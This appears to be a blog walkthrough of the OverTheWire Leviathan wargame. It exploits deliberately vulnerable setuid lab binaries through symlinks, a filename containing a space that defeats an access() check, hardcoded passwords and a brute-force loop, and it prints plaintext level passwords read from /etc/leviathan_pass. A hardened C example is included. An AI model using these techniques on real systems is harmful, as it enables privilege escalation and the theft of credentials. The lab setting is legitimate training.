Wargames study notes -- Leviathan
2022-07-03 20:05:00 【Zhaohg720】
Wargame link: https://overthewire.org/wargames/leviathan/
Level 0
Username: leviathan0
Password: leviathan0
Level 0 --> Level 1
Log in as leviathan0.
In the home directory, run
ls -a
This reveals a hidden directory, .backup, which contains an HTML file. Copy the file locally and open it in a browser, then search for "password" to find the password:
Not Found
The requested URL /passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m was not found on this server.
Apache/2.4.10 (Debian) Server at leviathan.labs.overthewire.org Port 80
Level 1 --> Level 2
Log in as leviathan1.
The home directory contains an executable file named check. Running it prompts for a password, so copy it to the local machine with scp and look at it in IDA.

The key part compares the input string with "sex". If the comparison succeeds, the program executes a shell, /bin/sh. Enter that password at the password prompt to get the shell, which already has leviathan2 privileges, so the password can simply be read with cat.
[email protected]:~$ ./check
password: sex
$ id
uid=12002(leviathan2) gid=12001(leviathan1) groups=12001(leviathan1)
$ cat /etc/leviathan_pass/leviathan2
ougahZi8Ta
$
Level 2 --> Level 3
Log in as leviathan2.
The home directory contains an executable named printfile. According to its usage prompt, it should be able to read the password file directly.
[email protected]:~$ ./printfile
*** File Printer ***
Usage: ./printfile filename
[email protected]:~$ ls -l
total 8
-r-sr-x--- 1 leviathan3 leviathan2 7436 Aug 26 2019 printfile
Printing the password file directly fails with a message that there is no such file, so look at the source code.
The key point is that the program uses access() to check the file named on the command line, and only then prints it with cat, passing the input along as typed. To get past the check, create a symbolic link to the password file, then create a file whose name starts with the link name followed by a space, and run the program on that file. access() checks the name as a single file, while cat sees it split into two file names, and one of them is the link to the password.
mkdir /tmp/leviathan2
cd /tmp/leviathan2
ln -s /etc/leviathan_pass/leviathan3 getpass
touch "getpass 1.txt"
~/printfile getpass\ 1.txt
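As an added illustration (not code from the original post or from the OverTheWire binary), the C example below shows a hardened way to do what printfile does, so that the name that is checked and the file that is printed cannot diverge. The function names and the policy that the file must be a regular file owned by the real user are assumptions.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed weak shape (not the binary's source): access(name) passes, then
 * system("cat <name>") lets the shell re-split the name into several words. */

/* Hardened form: open once, validate the opened object, read that descriptor.
 * Returns an fd >= 0, or -1 with errno set. */
int open_for_real_user(const char *path)
{
    /* O_NOFOLLOW refuses a symbolic link as the final path component. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    struct stat st;
    /* fstat() describes what was actually opened, not what a name points to. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != getuid()) {
        close(fd);
        errno = EACCES;
        return -1;
    }
    return fd;
}

/* Copy the file to `out` without any shell; returns bytes copied or -1. */
long print_file(const char *path, int out)
{
    int fd = open_for_real_user(path);
    if (fd < 0)
        return -1;
    char buf[4096];
    long total = 0;
    ssize_t n;
    while ((n = read(fd, buf, sizeof buf)) > 0) {
        if (write(out, buf, (size_t)n) != n) { close(fd); return -1; }
        total += n;
    }
    close(fd);
    return n < 0 ? -1 : total;
}

int main(int argc, char **argv)
{
    return (argc == 2 && print_file(argv[1], STDOUT_FILENO) >= 0) ? EXIT_SUCCESS : EXIT_FAILURE;
}
```

A setuid program would normally also drop its effective UID with seteuid(getuid()) before opening the file, so the kernel applies the caller's own permissions.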
Level 3 --> Level 4
Log in as leviathan4.
This level is very similar to the previous one.

The main function contains little; the real content is in the do_stuff() function.

Clearly, the string being compared against is snlprintf, and entering it gets a shell in the same way.
./level3
Enter the password> snlprintf
[You've got shell]!
$ id
uid=12004(leviathan4) gid=12003(leviathan3) groups=12003(leviathan3)
$ cat /etc/leviathan_pass/leviathan4
Level 4 --> Level 5
Log in as leviathan5.
The home directory has a hidden directory, .trash, which contains an executable file named bin.
[email protected]:~$ ls -la
total 24
drwxr-xr-x 3 root root 4096 Aug 26 2019 .
drwxr-xr-x 10 root root 4096 Aug 26 2019 ..
-rw-r--r-- 1 root root 220 May 15 2017 .bash_logout
-rw-r--r-- 1 root root 3526 May 15 2017 .bashrc
-rw-r--r-- 1 root root 675 May 15 2017 .profile
dr-xr-x--- 2 root leviathan4 4096 Aug 26 2019 .trash
[email protected]:~/.trash$ ltrace ./bin
__libc_start_main(0x80484bb, 1, 0xffffd774, 0x80485b0 <unfinished ...>
fopen("/etc/leviathan_pass/leviathan5", "r") = 0
+++ exited (status 255) +++
[email protected]:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
Running it directly prints the password in binary; converting each base-2 group to its ASCII character recovers it.
b_password = '01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010'
list_password = b_password.split(' ')
password = ''
for bits in list_password:
    # each group is one 8-bit ASCII code written in base 2
    password += chr(int(bits, 2))
    # print(int(bits, 2))
print(password)
Level 5 --> Level 6
Log in as leviathan6.
There is an executable program; take a look at it in IDA.

It reads the contents of /tmp/file.log, and this file does not exist, so the symbolic link method can be used again:
ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
Then run ./leviathan5 directly and the password is displayed.
Level 6 --> Level 7
Log in as leviathan6.
[email protected]:~$ ./leviathan6
usage: ./leviathan6 <4 digit code>
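The usage message asks for a four-digit code, so it clearly wants us to brute-force it. Files on the target are deleted after a short time, which makes working there inconvenient, so copy the binary locally and brute-force it with a shell script:
#!/bin/bash
# Try each code from 1000 to 9999 against the local copy of the binary
for i in {1000..9999}
do
    /root/Desktop/leviathan6 "$i"
    # print the code that was just tried
    echo "$i"
done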
Wrong
7122
# ^C
# id
uid=0(root) gid=0(root) groups=0(root)
# ^C
#
The run drops into a shell when it reaches 7123, so enter 7123 directly on the target and then cat the password.
[email protected]:~$ ./leviathan6 7123
$ cat /etc/leviathan_pass/leviathan7